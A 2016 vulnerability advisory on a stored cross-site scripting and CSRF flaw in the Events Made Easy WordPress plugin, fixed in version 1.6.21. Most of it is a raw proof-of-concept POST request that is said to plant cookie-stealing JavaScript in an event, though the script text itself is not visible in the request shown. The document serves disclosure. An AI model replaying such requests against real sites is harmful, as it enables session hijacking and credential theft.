------------------------------------------------------------------------ Cross-Site Scripting vulnerability in Events Made Easy WordPress plugin ------------------------------------------------------------------------ Job Diesveld, July 2016 ------------------------------------------------------------------------ Abstract ------------------------------------------------------------------------ A Cross-Site Scripting vulnerability has been found in the Events Made Easy WordPress plugin. By using this issue an attacker can create a specially crafted event which, when posted to WordPress, injects malicious JavaScript code into the application. This code will execute within the browser of any user who views the relevant application content. ------------------------------------------------------------------------ OVE ID ------------------------------------------------------------------------ OVE-20160729-0001 ------------------------------------------------------------------------ Fix ------------------------------------------------------------------------ This issue has been fixed in Events Made Easy [2] plugin version 1.6.21. ------------------------------------------------------------------------ Tested versions ------------------------------------------------------------------------ This issue was successfully tested on Events Made Easy [3] plugin version 1.6.20. ------------------------------------------------------------------------ Introduction ------------------------------------------------------------------------ The WordPress Events Made Easy [3] plugin is a full-featured event management solution for WordPress. It supports public, private, draft and recurring events, locations management, RSVP (+ optional approval), Paypal, 2Checkout, FirstData and Google maps. Upon adding a new Events Made Easy event within the WordPress admin interface, the plugin allows script code to be added to among others the Single Event Format textbox. The plugin insufficiently checks the nonces closedpostboxesnonce and meta-box-order-nonce when the event is posted to the server, nor is any other nonce employed to prevent CSRF from occurring. If an attacker can lure a WordPress admin into posting an event with malicious script code, this code is subsequently stored in the application and can be used to perform a wide variety of actions, such as stealing victims' session tokens or login credentials, performing arbitrary actions on their behalf, and logging their keystrokes. https://sumofpwn.nl/advisory/2016/poc-1.png ------------------------------------------------------------------------ Proof of Concept ------------------------------------------------------------------------ The following request can be used to create an event containing JavaScript that will obtain the cookie of the current user: POST /wp-admin/admin.php?page=events-manager&eme_admin_action=update_event&event_id=16 HTTP/1.1 Host: User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.11; rv:47.0) Gecko/20100101 Firefox/47.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate Cookie: Connection: close Content-Type: multipart/form-data; boundary=---------------------------224523339434990794855940370 Content-Length: 8579 -----------------------------224523339434990794855940370 Content-Disposition: form-data; name="event_status" 5 -----------------------------224523339434990794855940370 Content-Disposition: form-data; name="event_contactperson_id" -1 -----------------------------224523339434990794855940370 Content-Disposition: form-data; name="event_seats" 0 -----------------------------224523339434990794855940370 Content-Disposition: form-data; name="price" 0 -----------------------------224523339434990794855940370 Content-Disposition: form-data; name="currency" EUR -----------------------------224523339434990794855940370 Content-Disposition: form-data; name="eme_prop_max_allowed" 10 -----------------------------224523339434990794855940370 Content-Disposition: form-data; name="eme_prop_min_allowed" 1 -----------------------------224523339434990794855940370 Content-Disposition: form-data; name="eme_prop_rsvp_discount" -----------------------------224523339434990794855940370 Content-Disposition: form-data; name="eme_prop_rsvp_discountgroup" -----------------------------224523339434990794855940370 Content-Disposition: form-data; name="rsvp_number_days" 0 -----------------------------224523339434990794855940370 Content-Disposition: form-data; name="rsvp_number_hours" 0 -----------------------------224523339434990794855940370 Content-Disposition: form-data; name="eme_prop_rsvp_end_target" start -----------------------------224523339434990794855940370 Content-Disposition: form-data; name="event_name" fooname -----------------------------224523339434990794855940370 Content-Disposition: form-data; name="event_slug" fooname -----------------------------224523339434990794855940370 Content-Disposition: form-data; name="localised_recurrence_date" 07/29/2016 -----------------------------224523339434990794855940370 Content-Disposition: form-data; name="recurrence_start_date" 2016-07-29 -----------------------------224523339434990794855940370 Content-Disposition: form-data; name="localised_recurrence_end_date" 07/29/2016 -----------------------------224523339434990794855940370 Content-Disposition: form-data; name="recurrence_end_date" 2016-07-29 -----------------------------224523339434990794855940370 Content-Disposition: form-data; name="recurrence_freq" daily -----------------------------224523339434990794855940370 Content-Disposition: form-data; name="recurrence_interval" -----------------------------224523339434990794855940370 Content-Disposition: form-data; name="recurrence_byweekno" 1 -----------------------------224523339434990794855940370 Content-Disposition: form-data; name="recurrence_byday" 1 -----------------------------224523339434990794855940370 Content-Disposition: form-data; name="localised_event_start_date" 07/29/2016 -----------------------------224523339434990794855940370 Content-Disposition: form-data; name="event_start_date" 2016-07-29 -----------------------------224523339434990794855940370 Content-Disposition: form-data; name="localised_event_end_date" 07/29/2016 -----------------------------224523339434990794855940370 Content-Disposition: form-data; name="event_end_date" 2016-07-29 -----------------------------224523339434990794855940370 Content-Disposition: form-data; name="event_start_time" 01:22PM -----------------------------224523339434990794855940370 Content-Disposition: form-data; name="event_end_time" 01:22PM -----------------------------224523339434990794855940370 Content-Disposition: form-data; name="eme_prop_event_page_title_format_tpl" 0 -----------------------------224523339434990794855940370 Content-Disposition: form-data; name="event_page_title_format" lalalala -----------------------------224523339434990794855940370 Content-Disposition: form-data; name="eme_prop_event_single_event_format_tpl" 0 -----------------------------224523339434990794855940370 Content-Disposition: form-data; name="event_single_event_format"

#_STARTDATE - #_STARTTIME

#_TOWN

#_NOTES

#_ADDBOOKINGFORM

#_MAP

-----------------------------224523339434990794855940370 Content-Disposition: form-data; name="eme_prop_event_contactperson_email_body_tpl" 0 -----------------------------224523339434990794855940370 Content-Disposition: form-data; name="event_contactperson_email_body" -----------------------------224523339434990794855940370 Content-Disposition: form-data; name="eme_prop_event_registration_recorded_ok_html_tpl" 0 -----------------------------224523339434990794855940370 Content-Disposition: form-data; name="event_registration_recorded_ok_html" -----------------------------224523339434990794855940370 Content-Disposition: form-data; name="eme_prop_event_respondent_email_body_tpl" 0 -----------------------------224523339434990794855940370 Content-Disposition: form-data; name="event_respondent_email_body" -----------------------------224523339434990794855940370 Content-Disposition: form-data; name="eme_prop_event_registration_pending_email_body_tpl" 0 -----------------------------224523339434990794855940370 Content-Disposition: form-data; name="event_registration_pending_email_body" -----------------------------224523339434990794855940370 Content-Disposition: form-data; name="eme_prop_event_registration_updated_email_body_tpl" 0 -----------------------------224523339434990794855940370 Content-Disposition: form-data; name="event_registration_updated_email_body" -----------------------------224523339434990794855940370 Content-Disposition: form-data; name="eme_prop_event_registration_cancelled_email_body_tpl" 0 -----------------------------224523339434990794855940370 Content-Disposition: form-data; name="event_registration_cancelled_email_body" Dear #_RESPNAME, Your request to reserve #_RESPSPACES space(s) for #_EVENTNAME has been cancelled. Yours faithfully,awfe #_CONTACTPERSON -----------------------------224523339434990794855940370 Content-Disposition: form-data; name="eme_prop_event_registration_denied_email_body_tpl" 0 -----------------------------224523339434990794855940370 Content-Disposition: form-data; name="event_registration_denied_email_body" Dear #_RESPNAME, Your request to reserve #_RESPSPACES space(s) for #_EVENTNAME has been denied. Yours faithfully, #_CONTACTPERSONawef -----------------------------224523339434990794855940370 Content-Disposition: form-data; name="eme_prop_event_registration_form_format_tpl" 0 -----------------------------224523339434990794855940370 Content-Disposition: form-data; name="event_registration_form_format" -----------------------------224523339434990794855940370 Content-Disposition: form-data; name="eme_prop_event_cancel_form_format_tpl" 0 -----------------------------224523339434990794855940370 Content-Disposition: form-data; name="event_cancel_form_format" -----------------------------224523339434990794855940370 Content-Disposition: form-data; name="location_name" piet -----------------------------224523339434990794855940370 Content-Disposition: form-data; name="location_address" kaas -----------------------------224523339434990794855940370 Content-Disposition: form-data; name="location_town" foo -----------------------------224523339434990794855940370 Content-Disposition: form-data; name="location_latitude" 57.198 -----------------------------224523339434990794855940370 Content-Disposition: form-data; name="location_longitude" 9.67063 -----------------------------224523339434990794855940370 Content-Disposition: form-data; name="content" gold -----------------------------224523339434990794855940370 Content-Disposition: form-data; name="event_image_url" -----------------------------224523339434990794855940370 Content-Disposition: form-data; name="event_image_id" -----------------------------224523339434990794855940370 Content-Disposition: form-data; name="event_url" -----------------------------224523339434990794855940370 Content-Disposition: form-data; name="event_update_button" Update » -----------------------------224523339434990794855940370 ------------------------------------------------------------------------ References ------------------------------------------------------------------------ [1] https://sumofpwn.nl/advisory/2016/cross_site_scripting_vulnerability_in_events_made_easy_wordpress_plugin.html [2] https://downloads.wordpress.org/plugin/events-made-easy.1.6.21.zip [3] https://wordpress.org/plugins/events-made-easy/